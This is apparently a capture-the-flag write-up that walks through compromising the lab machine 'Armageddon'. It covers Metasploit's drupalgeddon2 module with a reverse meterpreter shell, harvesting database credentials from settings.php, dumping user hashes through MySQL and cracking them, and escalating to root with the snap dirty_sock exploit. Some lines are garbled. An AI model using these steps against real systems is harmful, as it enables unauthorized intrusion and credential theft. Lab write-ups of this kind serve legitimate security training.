One of the first things I do whenever looking at a new machine is check out the website to see what's on it, so with Armageddon I did the same. I checked the site and found a giant chicken on the main page! I wasn't familiar with the login platform, so I went ahead and ran an nmap on the machine next:
Output from the nmap scan told me that it was Drupal 7, which is good news because CMS's tend to be a gold mine for exploitation.
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/| /themes /CHANGELOG.txt /cron.php /INSTALL.mysql.txt| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Welcome to Armageddon | Armageddon
I went ahead and ran Metasploit (
msfconsole), did a search for Drupal 7, and sure enough there were a lot of available options. I picked
drupalgeddon also worked).
use unix/webapp/drupal_drupalgeddon2, then
set rhost to the attack machine and
set lhost to your
ifconfig tun0 address.
When you don't configure a payload in
msfconsole it automatically sets one up for you: In this case it defaulted to
php/meterpreter/reverse_tcp. After, simply type
run and once you're granted a meterpreter, type
Once I had my shell, I went ahead and typed
sysinfo and the usual things to get information about where I was and what was hanging around. By doing
cd sites/all I was able to stumble across
I want to take a look at the
settings.php page because it might tell us some interesting information about the current configurations on the machine, and in this case we find a few credentials associated with the database username and password. Perfect!
From here, I did a
cat /etc/passwd to see what accounts were on the machine and noticed
brucetherealadmin as the newest account because of it being at the bottom of the file, so it looked like my target.
cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTPUser:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd NetworkManagement:/:/sbin/nologind bus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separatedSSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin mysql:x:27:27:MariaDBServer:/var/lib/mysql:/sbin/nologin brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
I also see sql on here, so that's a good to know tip, since we have database credentials on the machine, but in order to pull up information from the database, I had to learn a little bit about
mysql cmds because I'm pretty bad with that sort of thing. I found the following link below and looked around to discover I could just use
mysql -u drupaluser -p drupal -e 'show databases;'
Database information_schema drupal mysql performance_schema
Looking for the password and usernames from individuals on the account (the second being an account I "created" on the original website"), I pulled the hash for
mysql -u drupaluser -p drupal -D drupal -e 'select name,pass from users;' <er -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;' then
hashcatted the password to reveal
From this point, I had a username and password so SSH'd into the machine and ran
cat user.txt to pull the user flag.
──(moo㉿spacecow)-[~]└─$ ssh firstname.lastname@example.org 17 ⚙The authenticity of host '10.129.187.69 (10.129.187.69)' can't be established.ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao. Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.129.187.69' (ECDSA) to the list of known hosts. email@example.com's password: Last login: Tue Mar 23 12:40:36 2021 from 10.10.14.2 brucetherealadmin@armageddon ~]$ cat user.txt
I typically run
sudo -l whenever I'm on a new machine and noticed
snap was the method of entry here, so
sudo /usr/bin/snap install * had to be used in order to install dirty-sock then ran
cat /etc/passwd to see if the account was created.
After checking the account, I then did
su dirty_sock with the same password, then
sudo -i to pull root and grab the last flag with